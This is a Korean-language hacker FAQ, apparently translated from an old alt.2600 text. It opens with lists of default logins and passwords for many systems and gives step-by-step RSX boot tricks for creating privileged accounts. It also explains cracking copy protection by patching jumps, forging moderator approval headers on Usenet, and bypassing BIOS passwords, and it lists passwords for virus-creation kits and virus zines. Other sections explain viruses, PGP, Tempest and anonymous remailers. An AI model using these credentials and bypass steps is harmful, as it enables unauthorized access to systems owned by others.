MANAGER COGNOS

OPERATOR DISC

MGR HPDESK

MGR HPWORD

FIELD HPWORD

MGR HPOFFICE

SPOOLMAN HPOFFICE

ADVMAIL HPOFFICE

MAIL HPOFFICE

WP HPOFFICE

MANAGER HPOFFICE

MGR HPONLY

FIELD HPP187

MGR HPP187

MGR HPP189

MGR HPP196

MGR INTX3

MGR ITF3000

MANAGER ITF3000

MAIL MAIL

MGR NETBASE

MGR REGO

MGR RJE

MGR ROBELLE

MANAGER SECURITY

MGR SECURITY

FIELD SERVICE

MANAGER SYS

MGR SYS

PCUSER SYS

RSBCMON SYS

OPERATOR SYS

OPERATOR SYSTEM

FIELD SUPPORT

OPERATOR SUPPORT

MANAGER TCH

MAIL TELESUP

MANAGER TELESUP

MGR TELESUP

SYS TELESUP

MGE VESOFT

MGE VESOFT

MGR WORD

MGR XLSERVER

일반적인 작업은 Pub, Sys, Data이다.

일반적인 패스워드는 HPOnly, TeleSup, HP, MPE, Manager, GR, Remote이다.

Major BBS

~~~~~~~~~

Sysop Sysop

Mitel PBX

~~~~~~~~~

SYSTEM

NeXTSTEP

~~~~~~~~

root NeXT

signa signa

me <null> (Rumored to be correct, not checked)

Nomadic Computing Environment (NCE) on the Tadpole Technologies SPARCBook3

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fax <no password>

PICK O/S

~~~~~~~~

DSA # Desquetop System Administrator

DS

DESQUETOP

PHANTOM

Prolog

~~~~~~

PBX PBX

NETWORK NETWORK

NETOP <null>

Radio Shack Screen Savers

~~~~~~~~~~~~~~~~~~~~~~~~~

RS<STORE_ID_NUMBER>

Rolm

~~~~

CBX Defaults

op op

op operator

su super

admin pwp

eng engineer

PhoneMail Defaults

sysadmin sysadmin

tech tech

poll tech

RSX

~~~

SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)

1,1/system (Directory [1,1] Password SYSTEM)

BATCH/BATCH

SYSTEM/MANAGER

USER/USER

Micro/RSX에 대한 디폴트 패스워드는:

MICRO/RSX

아니면 부팅 과정에서 날짜를 물을 경우 <CTRL-Z>를 친다. 그리고 다음을 이용하여 계정을 만든다.

RUN ACNT

또는 RUN $ACNT

(10 {oct}이하의 수는 특별한 권한이 있다.)

다시 부팅하여 날짜/시간 물음을 기다린다. ^C를 친다. 그리고 MCR 프롬프트에서 'abo at."을 친다. . 점을 만드시 포함한다!

이것이 잘 되면 , "acs lb0:/blks=1000"를 쳐서 다음 작업이 정지되지 않도록 약간의 스웝(swap) 공간을 확보한다. " run $acnt"라고 치고 7번이나 그 이하의 그룹의 어떤 계정의 패스워드라도 바꾼다.

^C는 제대로 작동하지 않을 수 있다. ^Z와 ESC를 시도해 본다. 3가지를 적절한 때나 그렇지 않은 때 모두 시도해 볼 수도 있다. 아무것도 제대로 되지 않을 경우, 정지 스위치로 적절하지 않은 날짜-시간 뒤에 시스템을 정치한다. 사용자 모드 PSW 1[4-7]xxxx. 를 찾고 R6에 177777를 넣는다. 기도를 드린다음 디스크를 쓰기 방지하고 다시 시스템을 시동한다. 이렇게 하면 아마도 간접적으로 시스템을 터뜨릴 것이다. 아마도 시스템이 완벽하게 보호되지 않았을 것이다.

SGI Irix

~~~~~~~~

4DGifts <no password>

guest <no password>

demos <no password>

lp <no password>

nuucp <no password>

tour <no password>

tutor <no password>

System 75

~~~~~~~~~

bcim bcimpw

bciim bciimpw

bcms bcmspw, bcms

bcnas bcnspw

blue bluepw

browse looker, browsepw

craft crftpw, craftpw, crack

cust custpw

enquiry enquirypw

field support

inads indspw, inadspw, inads

init initpw

kraft kraftpw

locate locatepw

maint maintpw, rwmaint

nms nmspw

rcust rcustpw

support supportpw

tech field

Taco Bell

~~~~~~~~~

rgm rollout

tacobell <null>

Verifone Junior 2.05

~~~~~~~~~~~~~~~~~~~~

Default password: 166816

VMS

~~~

field service

systest utep

XON / XON Junior

~~~~~~~~~~~~~~~~

Default password: 166831

트로이목마/웜/바이러스/논리 폭탄이란 무엇인가?

이 FAQ는 Theora가 작성한 것이다.

트로이 목마 :

트로이 목마를 기억하는가? 도시에 악독한 짓을 하기 위해 나쁜 놈들이 그 안에 숨어 있던 것이다. 트로이 컴퓨터 프로그램은 이와 비슷하다. 허가된 프로그램 속에서 허가되지 않은 기능을 수행하는 것이 바로 이 프로그램이다. 이것은 자신이 해야할 것이 아닌 다른 것, 대개는 (꼭 그런 것은 아니지만) 악의에 찬 어떤 것을 한거나, 프로그래머가 의도했던 것이 아닌 것을 하는 프로그램이다. 의도된 것이 아니라면, 버그라고 불러야 하고, 때때로 특징이라고 부를수도 있다. 몇몇 바이러스 검색 프로그램(scanner)에서 트리이 목마 프로그램을 검출한다. 어떤 바이러스 검색 프로그램은 트로이 목마를 검색할 수 없다. 어떤 바이러스 스캐너도 모든 트로이 목마 프로그램을 다 검출할 수 없다.

바이러스:

바이러스는 자신을 복재하는 독립적인 프로그램이다. 다른 프로그램에 기생할 수 있고, 자신의 복사를 만들 수 있다.(마치 기생 바이러스에서와 같이) 바이러스는 데이터를 망치거나 오염시킬 수 있다. 그리고 데이터를 변경하거나, 메모리나 디스크 공간을 이용함으로서 시스템의 성능을 저하시킬 수 있다. 어떤 바이러스 검색 프로그램은 바이러스를 검출한 다. 어떤 바이러스 검출 프로그램도 모든 바이러스를 검출할 수는 없다. 어떤 바이러스 검색 프로그램도 모든 혹은 일부, 알려지거나 혹은 알려지지 않거나, 현재 또는 미래의 바이러스로부터 보호할 수 없다.

웜:

Robert Morris Jr.에 의해서 유명하게 되었다. 웜은 자신을 증식한다. 시스템에서 시스템으로 증식하고 때때로 시스템의 성능을 떨어뜨린다. 자체로 완벽하고 네트워크를 이용하여 퍼져나간다. 이것은 바이러스가 디스크를 이용하는 것과 같다. 어떤 이는 바이러스나 웜에 대한 대책은 파일이나 네트워크를 가지지 않는 것이라고 한다. 아마 맞을 것이다. 아마 컴퓨터도 이 목록에 포함해야 할 것 같다.

논리 폭탄:

특정조건이 만족되면 특정형태의 '공격'을 하는 코드이다. 예를 들어, 12월 5일에 모든 파일을 지워버리는 논리폭탄이 있을 수 있다. 바이러스와 달리 논리폭탄은 자신을 복제할 수 없다.

바이러스 같은 것으로부터 나 자신을 어떻게 보호할 것인가?
이 FAQ는 Theora에 의해서 작성되었다.

가장 흔한 바이러스는 부트 섹터를 감염하는 것이다. 이러한 형태의 바이러스로부터 자신을 보호하기 위해서는 기록을 할 필요가 없는 디스크는 전부 기록방지하는 것이다. 확실히 기록방지된 부팅 디스켓을 보관하고 있어야 한다. 바이러스가 나타나면 일을 매우 쉽게 할 것이다.

좋은 바이러스 검색 프로그램으로 새로운 파일들을 조사해야 한다. 좋은 것들로 F-Prot, Dr.

Solomon's Anti-Virus Toolkit, 그리고 Thunderbyte Anti-Virus가 있다. AVP 또한 좋은 프로그램이다. 한 가지 이상의 검색 프로그램을 가지고 있는 것이 좋다. 이번 달에 한 두 사람이 빠뜨린 바이러스가 있을 수 있으니까.

하루 8개의 바이러스가 평균적으로 만들어 진다. 어떤 바이러스 검색 프로그램도 그 추세를 좇아갈 수 없다. 그러나, 위의 4개는 현 추세를 좇아가고 있는 좋은 것들이다. 좋은 바이러스 검색 프로글매이라면 대부분의 주요 바이러스를 검출할 수 있다. 어떤 바이러스 검색 프로그램도 모든 바이러스를 검출할 수 있는 것이 아니다.

현재 5600여종의 바이러스가 있다. 항상 새로운 것이 작성된다. 바이러스 검출을 위해서 바이러스 검색 프로그램을 사용하고 있다면 자주 갱신을 해야 한다. 이상행동 방지 프로그램에 의존하고 있다면 이러한 종류의 프로그램은 쉽게 피해갈 수 있는 기법이 있음을 알아야 한다.

검색 프로그램과 무결성 조사 프로그램을 이용하려 한다면 이것이 보호에 어느정도 도움은 되지만 완벽한 것이 아님을 알아야 한다 .

상주 스캐너(resident scanner)와 같은 바이러스 검색 프로그램을 원할 수 있다. 이러한 프로그램은 램에 상주하여 프로그램 수행을 감시한다.(그리고 때때로 프로그램을 포함하는 파일을 감시하기도 한다.) 프로그램을 수행하려 하면 상주 스캐너는 제어권을 넘겨받고 프로그램을 먼저 검사한다. 바이러스가 없으면, 프로그램은 수행할 수 있도록 허가된다.

바이러스 검색 프로그램은 대부분의 트리이 목마 프로그램, 웜, 논리폭탄으로 보호해 주지 않는다. 이론적으로 논리폭탄 그리고/도는 웜으로부터 보호할 수 있지만, 대개는 그렇게 하지 않는다.

가장 좋은 방법은, 그리고 실제로 유일한 방법은, 시스템에 무엇이 있는지 알고 그것들이 자신에 의해 허가된 것들인지를 아는 것이다. 중요한 파일은 자주 백업을 해야 한다. DOS 시스템 파일은 기록방지해야 한다. 기록할 필요가 없는 모든 디스크는 기록방지를 한다. 바이러스가 생기면 놀라지 마라. 잘 모르면 회사 내의 지원부서를 불러서 anti-virus 프로그램을 이용하게 한다. 대바이러스(anti-virus) 프로그램을 공급한 회사의 지원이 부실한 경우는 회사를 바꾸라.

바이러스가 퍼지지 않도록 하는 가장 확실한 방법은 안 퍼뜨리는 것이다. 어떤 이들은 고의적으으로 퍼뜨린다. 그렇게 하지 않기를 바란다. 바이러스는 그렇게신나는 것이 아니다.

바이러스에 대한 정보는 어디서 얻을 수 있나?

이 FAQ는 Theora에 의해서 작성되었다.

어셈블리 언어 프로그램 책은 (지루한) 복제의 일면을 보여주고, 장기간 설명한다. 바이러스에 대하여 가장 흥미롭고/신나는 것은 논쟁이다. 자유 의사표시(free speech), 적법성, 그리고 바이러스의 증상들은 "find first"와 "find next" 함수의 호출을 추적하는 것보다 재밌다. 바이러스를 발견하면 바이러스에 대한 기술적인 정보나 도움을 virus-l FAQ에서 얻을 수 있다. 이것은 comp.virus에 흔히 올라와 있다. 여기서는 다양한 논쟁도 엿볼수 있다. alt.virus와 같은 뉴스그룹도 있다. 그러나, 기술적인 전문성은 높지가 않다. 그리고 바이러스를 없애려는 사람들에게 크게 도움이 되지는 않는다.

바이러스의 전문가는 많이 있다. 자신을 전문가라고 생각해도 된다. 물론 농담이지만. 바이러스을 이해하기 위해서는 프로그래밍, 운영체제와 그 상호동작을 알아야 한다. 바이러스족(Cult of Virus)에 대해서 모두 이해하기 위해서 많은 식별과정이 필요하다. 바이러스와 바이러스족에 대한 좋은 논문이 많이 있다. Virus-l의 FAQ에 수록된 사람들로부터 그들에 대한 정보를 얻을 수 있다. FTP 사이트 ftp.informatik.uni-hamburg.de에는 좋은 프로그램과 문서가 있다.

암호xxx란 무엇인가?

이 FAQ는 Computer Security Basics라는 책에서 인용한 것이다.

메시지는 평문(plaintext, clear text)이라고 불린다. 메시지의 내용을 숨기기위한 과정을 암호화(encryption)라고 한다. 암호화된 메시지는 암호문(ciphertext)이라고 부른다. 암호문을 평문으로 만드는 것을 복호화(decryption)이라고 한다.

메시지를 안전하도록 하는 기술이나 과학을 암호제작(cryptography)라고 한다. 그리고 암호학은 암호제작자(cryptographer)들에 의해서 행해진다. 암호분석가(cryptanalysist)는 암호분석(cryptoanalysis)를 행하는 사람들로, 암호해독은 암호문을 깨는 것이다. 다시 말해서 숨겨진 것을 본다는 것이다. 암호법과 암호분석을 합하여, 수학에서는 암호학(cryptology)이라고 한다. 그리고 이것을 행하는 사람들을 암호학자(cryptologist)라고 한다.

PGP란 무엇인가?

이 FAQ는 PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann의 인용문이다.

PGP(tm)은 공개키 암호를 이용하여 E-mail와 데이터 파일을 보호한다.

안전하기 않은 통로를 통해서 안전하게 통신하기 위해서는 키의 교환이 필요하다. PGP는 기능이 잘 되어 있고 빠르다. 복잡한 키 관리, 디지탈 서명, 데이터 압축 그리고 훌륭한 인간공학적 설계이 되어 있다.

Pretty Good(tm) Privacy(PGP)는 Phil's Pretty Good Software에서 만들었으며, MS-DOS, UNIX, VAX/VMS 와 여러 컴퓨터에서 수행한다. PGP는 사람들이 프라이버시의 보호 및 인증을 편리하게 할 수 있게 한다. 프라이버시란 메시지를 받게 되어 있는 사람만이 메시지를 읽을 수 있도록 한다는 것을 의미한다. 인증이란 메시지를 보낸 사람이 정말 그 사람인지를 확증하는 것이다. 편리성이란 브라이버시와 인증이 일반적인 암호화 프로그램과는 달리 키를 관리하는 것이 쉽다는 것이다. 사용자 간의 키를 교환하는데 있어서 안전한 통로가 필요하지 않다. 따라서 PGP을 사용하는 것이 쉽다. 이것은 PGP가 공개키(public key) 암호화 기법을 사용하고 있기 때문이다.

Tempest란 무엇인가?

Tempest는 Transient Electromagnetic Pulse Surveillance Tehcnology의 약어이다.

컴퓨터와 전자장비는 주변에 간섭을 한다. 비디오 모니터 두 개를 가까이하면 이같은 현상을 확인할 수 있다. 모니터를 떼어 놓을 때까지 그림이 잘 안 보인다. 컴퓨터에서 나오는 디지털 신호는 관찰자에게 중요한 것이다. 이러한 전파의 방출은 두 경로가 있다. 방사 방출(radiated emission)과 유도 방출(conducted emission)이다. 방사 방출은 전자 장치이 조립되어서 마치 안테나와 같은 역할을 하는 것이다. 유도 방출은 방사가 케이블이나 선에 의해서 전자 유도되는 형태이다.

대부분의 경우 이러한 방출은 단지 귀찮은 것이지만 매우 유용할 때가 있다. 목표물이 어떤 프로젝트를 하고 있는지 알고 싶다고 생각하자. 사무실 밖에 있는 자동차에서 정교한 전자 장비를 이용하여 모니터로부터 방출되는 신호를 분석하려고 할 수 있다. 이러한 방출은 대개 55-245Mhz 사이에 존재하고 1킬로미터 밖에서도 읽을 수 있다.

감시 장비는 주파수의 차이에 따라서 전파를 방출하는 장치를 구분할 수 있다. 예를 들어 VDU의 구성요소, VDU를 재생하기 위한 생성과정, 라인 싱크 등을 구분할 수 있다. raster(래스터) 신호을 일치시킴으로 수동적이고 실시간으로 화면을 구성할 수 있다. 이러한 기술은 정부 기관이 아니라 누구라도 얻을 수 있는 것이다.

목표에서는 전자의 방출을 막을 수 있다. 또는 방출이 매우 낮은 장비를 사용할 수 있다. Tempest 인증은 정부 문서인 NACSIM 5100A(비밀)의 규정을 통과한 것을 의미한다. 이 문서는 처리 중인 정보를 방출하지 않을 수 있는 수준을 정해 놓았다.


익명 재전송 메일(anonymous remailer)이란 무엇인가?

이 FAQ는 Raph Levien에 의해 작성된 것이다.

익명 재전송 메일(Anonymous remailer)는 인터넷 상의 시스템으로 Usenet에 메시지를 익명으로 보낼 수 있도록 하는 것이다.

널리 사용되는 익명 재전송 메일은 두 가지가 있다. 첫째의 것이 anon.penet.fi 형이다. 두 번째는 cypherpunk 형이다. anon.penet.fi에 있는 형태의 것은 매우 인기가 있다. 160,000명 이상의 사용자가 이용했다. 약 수만명의 이용자가 날마다 이용하고 있는 것으로 생각된다. 이것의 큰 장점은 사용하기 쉽다는 것이다. cypherpunk 메일러는 보안성이 좋아서 인기가 높아가고 있다.

anon.penet.fi 시스템은 사용자는 익명 id를 얻어야 한다. 이미 하나 가지고 있는 사람에게 메일을 보내거나, ping@anon.penet.fi에 메일을 보내면 된다. 각각의 경우에 penet은 새로운 익명 id를 보내 준다. 예를 들어 an123456@anon.penet.fi와 같다. an123456은 시스템의 다른 사용자에게 메일을 보낸다. 다음과 같은 일이 일어난다.

1. 메일은 anon.penet.fi로 전송되어 Finland의 Espoo 근처에 있게 된다.

2. 이 단계는 anon.penet.fi에서 수행하는 소프트웨어에 의한다. Penet은 송신자의 email 주소를 데이터베이스에서 검색하고 숫자 코드로 그것을 대치한다. 이를 제외한 송신자에 대한 모든 정보는 삭제된다.

3. 그리고 나서 penet은 같은 데이터베이스에 있는 수신자의 번호를 검색한다. 그리고 실제의 email 주소로 대치한다.

4. 마지막으로 email을 수신자의 실제 주소로 보낸다.

이러한 방식에는 Usenet에 포스팅하는 것과 같은 다른 변형이 있을 수 있다.(이 경우 단계 3이 제외된다.) 그러나, 앞의 단계들이 기본적인 생각이다.

anon.penet.fi가 email 주소와 anon의 id를 비교할 때, 비밀 데이터베이스를 사용하는 반면에 cypherpunks의 재전송메일은 실제 자신을 숨기기 위해서 암호기법을 이용한다. 실제 email 주소으로 자신의 실제 신분을 숨기고 email을 보내거나 Usenet에 포스팅을 하려고 한다고 가정하자.

재선송메일러를 통해서 보내기 위해서 다음과 같은 일이 일어난다.

1. 메시지와 수신자의 주소를 암호화한다. 이 때 키는 재전송메일러가 선택한 공개키를 이용한다.

2. email을 재전송메일러에 보낸다.

3. 재전송메일러가 메일을 받을 때, 비밀키를 이용하여 복호화한다. 평문이 메시지와 수신자의 주소가 나타난다.

4. 송신자에 대한 모든 정보가 삭제된다.

5. 마지막으로 송신자의 주소로 email을 보낸다.

재전송메일러의 관리자를 믿는다면 이것은 꽤 괜찮은 편이다. 그러나, cypherpunks의 재전송메일러의 전체적인 점은 어떤 개인이나 시스템도 믿을 필요가 없다는 것이다. 따라서, 정말로 보안을 원하는 사람들은 재전송메일러를 연쇄적으로 사용할 수 있다. 만일 이러한 연결 중의 재전송메일러가 정직한 것이라면 메시지의 프라이버시가 보장된다.

연쇄적인 재전송메일러를 사용하기 위해서 먼저 러시아의 매트료시카 인형(양파)처럼 여러 층으으로 메시지를 암호화한다. 이러한 메시지를 준비하는 것은 지루하고 실수가 일어날 소지가 많으므으로 사람들은 자동화된 도구(premail package와 같은)를 이용한다. 어쨌던 메시지를 준비하고 나서, 첫 번째 수신 재전송메일러에 보낸다. 이것은 암호화의 가장 바깥쪽에 있는 것과 대응된다.

각 재전송메일러는 암호화된 층을 하나씩 벗겨서 다음 곳으로 보내어 최종 재전송메일러에 도착하게 된다. 이 때, 가장 안 쪽의 암호화된 메시지만 남는다. 이것이 풀리면 평문과 수신자의 주소이 나타난다. 이 때 메시지는 실제 수신자에게 보내진다.

재전송메일은 많은 지역에 위치한다. 일상적인 메시지는 목적지에 도착하기 전에 캐나다, 네델란드, Berkeley대학 그리고 핀란드을 지나게 된다.

암호화된 메시지를 준비해야하는 어려움과 더불어, cypherphunk의 재전송메일러의 또 다른 단점은 anonymous mail에 대한 응답이 쉽게 오지 않는다는 것이다. 송신자 측의 모든 정보가 사라진다. 그렇지만 새로운 에일리어스 서버가 그것을 변경하려고 한다. 에일리어스 서버를 이용하려고 하면, 새로운 email 주소를 만들어야 한다(내것은 raph@alpha.c2.org이다.) 이 새 주소로 보내진 메일은 그 사람의 실제 주소로 보내지며 그 과정은 알 수 없게 된다.

이것을 해결하기 위해, 먼저 email 주소를 여러 층으로 암호화를 한다. 그리고나서 암호화된 통로을 통해서, 사용하고자 하는 nickname과 함께 암호화된 주소를 에일리어스 서버에 보낸다. 에일리어스 서버는 암호화된 주소를 데이터베이스에 등록한다. 에일리어스 서버는 응답 메일을 anon.penet.fi와 같은 방시으로 처리하는데 익명 재전송메일러의 연쇄를 통해서 전달한다는 것이 다르다.

최대의 보안을 하기 위해서, 사용자는 사용자는 연쇄의 재전송메일러가 email주소에서 한 암호화 층을 제거할 때 또 다른 층의 암호화를 추가할 수 있다. 사용자가 최종적으로 email을 얻을 경우, 다층의 암호화가 되어 있다. 매트료시카 인형은 한 번에 하나씩 꺼내어 마지막 평문 메시지가 드러나도록 한다.

마지막으로 생각할 점은 재전송메일러들이 모두 안정적이어야 한다는 것이다. 이것은 특히 연쇄적인 재전송메일러를 이용했을 경우에 그렇다. -- 하나라도 제대로 동작하지 않는 것이 있다면 메시지는 없어지게 된다. 이것은 왜 필자가 안정적인 재전송메일러의 목록을 유지하고 있는지의 이유이다. 안정적인 제전송메일러를 선택하면 메시지가 원하는 곳에 도착할 확률이 매우 높다.


익명 재전송 메일은 어디에 있나?

가장 인기좋고 안정적인 익명 재정송메일러는 anon.penet.fi이며 Johan Helsingus에 의해 운영되고 있다. 익명 ID를 얻을려면 ping@anon.penet.fi로 메일을 보내기 바란다.

anon@penet.fi의 서버는 실제 메일이 전송되어 온 곳의 어떤 정보라도 지우기 위해 최선을 다한다. 자신을 드러낼 수 있는 정보가 그러한 메시지에 포함되지 않도록 노력한다. 메시지를 다음과 같은 주소로 보낸다.

anXXX@anon.penet.fi

이제 자신을 포함한 다른 익명 사용자의 email 메시지의 송신지가 anon.penet.fi가 된다.

alt.security@anon.penet.fi

익명 메시지를 전체 Usenet 그룹에 포스팅한다고 하자. 이 경우에는 (핀란드에 있는)local site에 있는 alt.security로 한다고 하자.

ping@anon.penet.fi

만일 이 주소로 메일을 보내면 신분(identity)이 하나 할당된다.(이미 가지고 있지 않다고 가정한다.) 여기서 자신의 신분을 확인해도 된다.

자신의 패스워드를 설정할 수도 있다. 이 패스워드는 자신이 보내게 될 메시지를 인증한다. 이 패스워드는 전송할 메시지에 포함한다. 패스워드를 설정하기 위해서 password@anon.penet.fi로 본문에 패스워드를 포함하여 메일을 보낸다. 예를 들어

To: password@anon.penet.fi

Subject:

TN0_rUlEz

더 자세한 정보를 얻기 위해 다음으로 메일을 보낸다.

help@anon.penet.fi

익명 Usenet 포스팅은 그들의 의견은 가치가 없다고 주장하는 다른 Usenet 그룹의 사용자에 의해서 전달된다. 이것은 그들이 익명성이 다른 사람의 공격을 막아주기 위해 사용되고 다른 한편으로 사회적인 편견으로부터 자신을 보호하기 위한 것이라고 믿기 때문이다. (사람들이 자신의 의견을 상관에게 개진할 때) 또한 이것을 공권력에 대해 자신의 신분을 숨기는 도구로 생각하고 있다면 다시 한 번 더 고려를 해 보라. 왜냐하면 판사가 서버의 관리지에게 포스팅한 사람의 신분을 밝힐 것을 명령한 유명한 판례가 있기 때문이다.

익명 재전송메일러의 목록을 보고 싶다면 finger remailer-list@kiwi.cs.berkeley.ede를 하거나 웹 브라우저를 이용하여 http://www.cs.berkeley.edu/~raph/remailer-list.html를 보기 바란다.


복사 방지를 어떻게 깨나?

복사방지를 깨기위한 두가지 흔한 방법이 있다. 프로그램을 이용하여 복사방지를 제거하는 것이 첫 번째이다. 인기 있는 프로그램으로 Central Point Software의 CopyIIPC와 Quaid Software의 CopyWrite이 있다. 두 번째 방법은 복사 방지 프로그램을 패치하는 것이다. 인기 있는 소프트웨어에 대한 만들어진 패치를 구할 수 있다. hex 편집기를 이용하여 패치를 한다. 패를 구할 수 없다면 혼자서 패치를 해야 한다.

패치를 하기 위해서는 디버거가 있어야 한다. Soft-Ice나 Sourcer같은 것들이 있다. 어셈블리 언어에 대한 약간의 지식도 필요하다. 디버거에서 복사방지 프로그램을 읽어서 복사 방지 기법을 알아낸다. 위치를 찾아내면 코드를 변경한다. 코드를 JE와 같은 경우 JNE나 JMP로 바꿀 수 있다. 아니면 NOP 명령으로 바꿀 수 있다.


127.0.0.1은 무엇인가?

127.0.0.1은 네트워크 접속의 루프백(loopback)이다. telnet, ftp를 하면 자신의 기계로 접속한다.

관리자 있는 뉴스그룹(moderated newsgroup)에 어떻게 포스팅을 하나?

Usenet 메시지는 메시지 헤더와 메시지 보디가 있다. 메시지 헤더는 뉴스 소프트웨어(reader)가 메시지를 어떻게 처리할 지 알려준다. 헤더는 두 부류로 나뉜다. 각각 필요한 것과 옵션인 것이다. 필요한 헤더는 "from"과 "Newsgrups"과 같은 것이다. 필요한 헤더없이 메시지는 제대로 포스팅되지 않는다.

옵션 헤더에는 "Approved" 헤더가 있다. 관리되는 뉴스그룹에 포스팅을 하기 위해서 메시지 헤더에 허가된(approved) 헤더 줄을 추가하기만 하면 된다. 헤더 줄에는 뉴스그룹 관리자 e-mail 주소가 있어야 한다. 대상 뉴스그룹에 대한 바른 포맷을 보려면, 뉴스그룹에서 메시지를 저장하여 문서 편집기를 가지고 보도록 한다.

"Approved: 헤버 줄은 다음과 같아야 한다.

Approved: will@gnu.ai.mit.edu

메시지 헤더에는 빈줄이 있어서는 안 된다. 빈 줄은 메시지의 일부로 해석된다.

더 상세한 정보는 RFC 1036을 읽기 바른다. USENET 메시지의 전송에 대한 표준이다.

e-mail로 Usenet에 어떻게 포스팅을 하나?

e-mail->Usenet 게이트웨이를 통해서이다. e-mail 메시지를 <newsgroup>@<servername>으로

보낸다. 예를 들어, alt.2600에 nic.funet.fi를 통해 포스팅을 하기 위해서 메일을 alt.2600@nic.funet.fi로 보낸다.

e-mail->Usenet 게이트웨이의 예가 있다.

group.name@news.demon.co.uk

group.name@charm.magnus.acs.ohio-state.edu

group.name@undergrad.math.uwaterloo.ca

group.name@nic.funet.fi

group.name.usenet@decwrl.dec.com


BIOS 패스워드는 어떻게 깨나?

BIOS가 어떤 것이냐에 따라서 달리진다. 일반적인 BIOS에는 AMI, Award, IBM과 Phoenix 것이 있다. 다른 BIOS도 많이 있따. 그러나, 이것들이 가장 흔한 것이다.

어떤 BIOS는 시스템이 부팅하기 전에 패스워드를 물어본다. 어떤 것은 BIOS 셋업을 하기 전에 패스워드를 묻는다.

모든 BIOS는 이러한 정보를 어딘가에 저장해 두어야 한다. 부팅이 온전하게 된 기계에 접근할 수 있따면, 패스워드를 볼 수 있을 것이다. 패스워드가 숨겨진 메모리 주소를 알아야 한다. 그리고 패스워드가 저장된 포맷도 알아야 한다. 또는 이것을 행할 수 있는 프로그램을 가지고 있어야 한다.

Ami BIOS에 대한 패스워드 공격 프로그램이 가장 흔하다. 어떤 패스워드 공격 프로그램은 평문으로 된 AMI BIOS의 패스워드를 돌려준다. 어떤 것은 ASCII로 된 코드를 돌려주고, 어떤 것은 스캔 코드로 된 것을 돌려준다. 이는 Ami BIOS의 버전에 따라 달라질 수도 있는 것이고 단순히 패스워드 공격 프로그램에만 따라 달라지는 것이 아니다.

BIOS 패스워드 공격 프로그램을 얻고 싶다면, ftp를 이용하여 oak.oakland.edu/simtel/msdos/sysutil/에서 받아가기 바란다.

파워를 켜고 난 상태에서 시스템에 접근할 수 없을 경우에도 패스워드를 우회할 수 있다. 패스워드는 CMOS 메모리에 있으며, 이것은 마더보드에 있는 배터리에 의해서 전원이 꺼져 있을 때도 유지된다. 배터리를 제거하면 CMOS 정보가 날아간다. 기계를 다시 사용하기 위해서 CMOS 셋업을 다시 해 주어야 한다. 기계의 주인이나 사용자는 BIOS의 패스워드가 없어진 것을 알고 놀라게 될 것이다.

어떤 마더보드에서는 배터리가 마더보드에 납땜되어 있어 분리하기 어렵다. 만약 이런 경우라면, 다른 방법이 있다. 마더보드에서 패스워드를 지우는 점퍼를 찾는다. 마더보드의 매뉴얼이 있으면 그 점퍼의 위치를 알 수 있다. 그렇지 않다면, 마더보드에 점퍼가 표시되어 있을 것이다. 두 경우에 해당하지 않는다면,어떤 점퍼인지 추측해 볼 수 있다. 대부분의 경우 배터리 근처에 점퍼가 있다.

암호화된 파일의 패스워드는 무엇인가?

이 FAQ는 crypt에 의해서 작성된 것이다. <crypt@nyongwa.montreal.gc.ca>

Magazine Password

~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~

VLAD Magazine Issue #1 vlad

VLAD Magazine Issue #2 vx

VLAD Magazine Issue #3 virus

NuKE InfoJournal Issue #2 514738

NuKE InfoJournal Issue #3 power

NuKE InfoJournal Issue #4 party

Program

~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~

Sphere Hacker 1.40 & 1.41 theozone

Virus Creation 2000 high level

Virus Construction Lab Chiba City

Ejecutor Virus Creator EJECUTOR

Biological Warfare v0.90 lo tek

Biological Warfare v1.00 freak


C/C++ 로 실행코드를 역컴파일할 수 있는 가능성은 없는가?

이 FAQ는 Bob Stout이 쓴 SNIPPET에서 인용한 것이다.

숨을 멈추지 마라. 생각을 해 보라. 역컴파일러가 작동하기 위해서 먼저 1) 모든 컴파일러가 최적화가 가장 잘 설정되었을 때라도, 동일한 코드를 생성해야 하고, 2) 역컴파일러가 어떤 컴파일러이 작성한 코드를 알아야 한다.

만일 첫 번째 조건이 맞다면, 모든 컴파일러 벤치마크는 소용없을 것이다. 왜냐하면 모든 코드가 동일한 동작을 하기 때문이다. 두 번째 경우가 참이라면, 새로운 컴파일러가 나오는 것을 고려하은 매우 거대한 프로그램이 되어야 한다.

좋다. 특정 컴파일러에 대한 특별한 역컴파일러라면 어떨까? - BC++ 4.5에만 적용되는 역컴파일러라면 어떨까? 이 경우 최적화 문제에 닿게 된다. 명확하고 이해하기 쉽게 작성된 코드는 대개 비효율적이다. 최대의 성능을 위해서 작성된 코드는 대개 난해하다. 여기에 덧붙여 요새 컴파일러은 어떤 최적화를 사용할지 아닐지에 대한 스위치가 있다. 요점은 큰 프로그램의 경우 최적화 스위치를 바꿈으로 다양한 오브젝트 모듈이 생성된다는 것이다. 그래서 역컴파일러는 어떤 최적화 스위치를 사용했는지 알 수 있어야 한다.

좋다. 더 간단하게 특정 컴파일러의 최적화를 번역하지 않고 가장 논리적인 원시 코드를 역컴파일한다고 하자. 그럼 어떻게 되는가? 좋은 최적화기는 코드의 내부과정을 재작성하기 때문에, 역카일해서 얻는 결과는 읽기 어려울 뿐만 아니라, 대부분의 경우 goto 문과 좋은 프로그램에서는 사용해서는 안 될 것들로 가득 차 있을 것이다. 여기서 역컴파일된 원스 코드는 얻게 되겠지만 무슨 소용이 있겠는가?

그리고 원시 모듈에 대해서 주목하자. C의 특성중의 하나가 쉽게 유지보수할 수 있는 원시 모듈(.C)로 쪼개져 있지 않을 경우 전체로는 읽기 어렵게 된다는 것이다. 역컴파일러가 그것을 어떻게 하겠는가? 역컴파일러는 하나의 거대한 main()함수를 만들어서 모듈성을 상실하게 한다. 또은 함수 하나하나를 하나의 파일로 만들려 할 수 있다. 전자의 경우 쓸모 없는 거대한 파일을 생성하고 두 번째의 경우 static의 함수나, 변수를 부를 경우 문제를 야기한다. 역컴파일러가 static 변수를 global로 만들수도 있으나, 역시 허용할 수 없는 것이다.

마지막으로 대부분의 상용 응용 프로그램들은 수행시간이 짧아야 하는 기능들은 어셈블리로 작성한다는 것이고 이것은 C로 역컴파일하기가 거의 불가능하다는 것이다.

